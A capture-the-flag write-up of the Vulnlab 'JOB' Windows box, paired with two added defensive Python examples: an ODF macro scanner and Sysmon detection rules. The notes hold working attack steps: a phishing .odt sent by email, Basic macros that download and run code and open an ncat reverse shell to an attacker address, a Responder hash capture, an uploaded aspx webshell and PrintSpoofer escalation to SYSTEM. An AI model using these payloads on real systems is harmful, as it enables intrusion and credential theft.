Here are my notes on the JOB box from Vulnlab.
JOB: 10.10.107.187
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Microsoft-IIS/10.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
We are looking for developers!
Please send your application to career@job.local! We recently switched to using open source products - please send your cv as a libre office document.
https://m.opnxng.com/@raphaeltzy13/introduction-to-client-side-attacks-oscp-62e9e254c0b7
https://github.com/0bfxgh0st/MMG-LO.git
./mmg-ods.py windows 1234 10.8.0.71
┌──(root㉿kali)-[/home/kali/Kali-Tools/MMG-LO]
└─# python3 mmg-ods.py windows 1234 10.8.0.71
[+] Payload: windows reverse shell
[+] Creating malicious .ods file
Done.
sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume' \
                       -a Resume.doc
sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume: http://10.8.0.71/Resume.doc' 
sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume: Please enable editing.' \
                       -a Resume.odt
┌──(root㉿kali)-[/home/kali/VL/JOB/10.10.107.187]
└─# sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume: Please enable editing.' \
                       -a Resume.odt
Oct 29 15:17:21 kali sendemail[193912]: Email was sent successfully!
The reverse shell from the document does not work, so we use the document to obtain a NetNTLM hash instead.
https://github.com/rmdavy/badodf
┌──(root㉿kali)-[/home/kali/Kali-Tools/badodf]
└─# python3 badodt.py
    ____            __      ____  ____  ______
   / __ )____ _____/ /     / __ \/ __ \/ ____/
  / __  / __ `/ __  /_____/ / / / / / / /_
 / /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\__,_/\__,_/      \____/_____/_/
Create a malicious ODF document help leak NetNTLM Creds
By Richard Davy
@rd_pentest
Python3 version by @gustanini
www.secureyourit.co.uk
Please enter IP of listener: 10.8.0.71
/home/kali/Kali-Tools/badodf/bad.odt successfully created
┌──(root㉿kali)-[/home/kali/Kali-Tools/badodf]
└─# ls
bad.odt  badodt.py  README.md
┌──(root㉿kali)-[/home/kali/Kali-Tools/badodf]
└─# mv bad.odt Resume.odt
┌──(root㉿kali)-[/home/kali/Kali-Tools/badodf]
└─# sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume' \
                       -a 'Resume.odt'
Oct 29 14:23:33 kali sendemail[179134]: Email was sent successfully!
Hash obtained with Responder -I tun0:
[SNIP] 
[SMB] NTLMv2-SSP Client   : 10.10.107.187
[SMB] NTLMv2-SSP Username : JOB\jack.black
[SMB] NTLMv2-SSP Hash     : jack.black::JOB:c186781b0844a1eb:743E74238005A260CFE6745FEC0F80E7:010100000000000000C2ABA50D2ADB01612807817C18C3AF00000000020008004800310033004C0001001E00570049004E002D005500440045005600350035004700330035004500540004003400570049004E002D00550044004500560035003500470033003500450054002E004800310033004C002E004C004F00430041004C00030014004800310033004C002E004C004F00430041004C00050014004800310033004C002E004C004F00430041004C000700080000C2ABA50D2ADB0106000400020000000800300030000000000000000000000000200000A3F02E29D698485E9A0BC8C9101264C628950B026635DDBC8D18EC5BE52FFE280A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0030002E00370031000000000000000000
#NOPE, cannot crack it.
[SNIP]
#If that doesn't work, at least we know the .odt file is the one we should exploit.
Exploiting the .odt works!
Resume.odt:
Sub Main
    Shell("cmd /c powershell ""iex(new-object net.webclient).downloadstring('http://10.8.0.71/')""")
    
End Sub
Sub Main
    Shell("certutil.exe -urlcache -split -f 'http://10.8.0.71/ncat.exe' 'C:\Users\Public\ncat.exe'")
    
End Sub
Sub Main
    Shell("C:\Users\Public\ncat.exe -e cmd.exe 10.8.0.71 1234")
    
End Sub
#One command at a time: multiple commands cannot be run from the same macro at once.
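Both documents used above (the Basic-macro Resume.odt and the badodf hash-leaking file) are things a mail gateway can inspect before delivery, since an ODF file is a zip archive: embedded Basic macros live under Basic/, and remote resources are referenced through xlink:href attributes. The scanner below is an added example (not part of these notes, MMG-LO or badodf); the sample documents it builds are constructed minimal zips, and the regex patterns and the 192.0.2.0/24 address are assumptions.

```python
import io
import re
import zipfile

# Things worth flagging in an inbound ODF document (assumed patterns, tune as needed):
# Basic calls that spawn processes, and hrefs that point at remote or UNC resources.
MACRO_SINK_RE = re.compile(r"\b(Shell|CreateObject|WScript\.Shell)\b", re.I)
EXTERNAL_HREF_RE = re.compile(r'xlink:href="((?:https?://|smb://|file://|\\\\)[^"]*)"', re.I)

def scan_odf(data):
    """Inspect an ODF (zip) document given as bytes; return macro modules, shell sinks, external links."""
    findings = {"macro_modules": [], "shell_calls": [], "external_links": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".xml"):
                continue
            text = zf.read(name).decode("utf-8", "replace")
            if name.startswith("Basic/"):   # any entry here means the document carries embedded Basic
                findings["macro_modules"].append(name)
                findings["shell_calls"] += [f"{name}:{m.group(0)}" for m in MACRO_SINK_RE.finditer(text)]
            else:                           # content.xml, styles.xml, manifest: look for remote references
                findings["external_links"] += [m.group(1) for m in EXTERNAL_HREF_RE.finditer(text)]
    return findings

def is_suspicious(findings):
    """Quarantine rule: any process-spawning macro call or any remote resource reference."""
    return bool(findings["shell_calls"] or findings["external_links"])

def build_sample_odt(macro=None, href=None):
    """Constructed minimal ODT-shaped zip for testing; not a real LibreOffice document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        content = '<office:document-content xmlns:xlink="http://www.w3.org/1999/xlink">'
        if href:
            content += f'<draw:image xlink:href="{href}"/>'
        zf.writestr("content.xml", content + "</office:document-content>")
        if macro:
            zf.writestr("Basic/Standard/Module1.xml", f"<script:module>{macro}</script:module>")
    return buf.getvalue()

if __name__ == "__main__":
    doc = build_sample_odt(macro='Sub Main\n    Shell("cmd /c echo test")\nEnd Sub')
    print(scan_odf(doc), is_suspicious(scan_odf(doc)))
```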
https://dominicbreuker.com/post/htb_re/
https://0xdf.gitlab.io/2020/02/01/htb-re.html
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.107.187] 54481
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>whoami
whoami
job\jack.black
C:\Program Files\LibreOffice\program>whoami
whoami
job\jack.black
C:\Program Files\LibreOffice\program>hostname
hostname
job
USER-SHELL ! 
C:\Users\jack.black\Desktop>whoami
whoami
job\jack.black
C:\Users\jack.black\Desktop>hostname
hostname
job
C:\Users\jack.black\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8032-DF86
 Directory of C:\Users\jack.black\Desktop
11/09/2021  09:43 PM    <DIR>          .
10/29/2024  05:07 PM    <DIR>          ..
11/09/2021  09:43 PM                36 user.txt
               1 File(s)             36 bytes
               2 Dir(s)  15,676,846,080 bytes free
C:\Users\jack.black\Desktop>type user.txt
type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC: 
jack.black -> iis apppool\defaultapppool
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """   #NOPE (unquoted service path check).
query user: nothing.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #NOPE
No hidden ports either.
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer #NOPE
WinPEAS: 
Hostname: job
    ProductName: Windows Server 2022 Datacenter
    EditionID: ServerDatacenter
    ReleaseId: 2009
    BuildBranch: fe_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
Looks like we can write files to the C:\inetpub\wwwroot folder (the IIS equivalent of /var/www/html).
Upload cmd.aspx to wwwroot.
http://10.10.107.187/cmd.aspx = runs as the iis apppool\defaultapppool user!
Use that webshell to get a netcat reverse shell, as we did before, this time as the IIS DefaultAppPool user.
sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.107.187] 55869
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>hostname
hostname
job
iis apppool\defaultapppool SHELL !
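From the defender's side, the two shell stages in these notes leave the same kind of process-creation footprint: soffice.bin spawning cmd.exe/certutil.exe from the macro, and the IIS worker w3wp.exe spawning cmd.exe from the webshell. The triage rules below over Sysmon-style Event ID 1 fields (ParentImage, Image, CommandLine) are an added example, not part of the original notes; the baseline sets, the regexes and the sample events are constructed, with 192.0.2.0/24 as a test address.

```python
import re

# Parent/child pairs that should not occur on a server in normal operation (assumed baseline).
OFFICE_PARENTS = {"soffice.bin", "soffice.exe", "winword.exe", "excel.exe"}
WEB_WORKER_PARENTS = {"w3wp.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "ncat.exe", "nc.exe"}
# LOLBin download and netcat -e command-line patterns matching the macro stage above.
CERTUTIL_DOWNLOAD_RE = re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I)
NCAT_SHELL_RE = re.compile(r"\bn?cat(\.exe)?\b.*\s-e\s+cmd", re.I)

def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the rule names a Sysmon-style process-creation event triggers (empty list = benign)."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_PARENTS and image in INTERPRETERS:
        hits.append("office_spawns_interpreter")
    if parent in WEB_WORKER_PARENTS and image in INTERPRETERS:
        hits.append("iis_worker_spawns_interpreter")
    if CERTUTIL_DOWNLOAD_RE.search(cmd):
        hits.append("certutil_download")
    if NCAT_SHELL_RE.search(cmd):
        hits.append("netcat_reverse_shell")
    return hits

# Constructed sample events mirroring the two shell stages in these notes.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\LibreOffice\program\soffice.bin", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell \"iex(new-object net.webclient).downloadstring('http://192.0.2.10/')\""},
    {"ParentImage": r"C:\Program Files\LibreOffice\program\soffice.bin", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://192.0.2.10/ncat.exe C:\Users\Public\ncat.exe"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c C:\Users\Public\ncat.exe -e cmd.exe 192.0.2.10 4444"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["Image"]), evaluate(ev))
```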
iis apppool\defaultapppool -> SYSTEM: 
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
POTATO !
C:\Users\Public>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
job
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
job
C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Rest of the nmap scan (ports 445, 3389, 5985):
445/tcp  open  microsoft-ds?
session setup failed: NT_STATUS_ACCESS_DENIED
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows
Takeaway: check whether you can write and upload files to the C:\inetpub\wwwroot folder so that you can gain a shell as the iis apppool\defaultapppool user. That user usually has SeImpersonatePrivilege enabled, hence Juicy-Potato (PrintSpoofer here)!
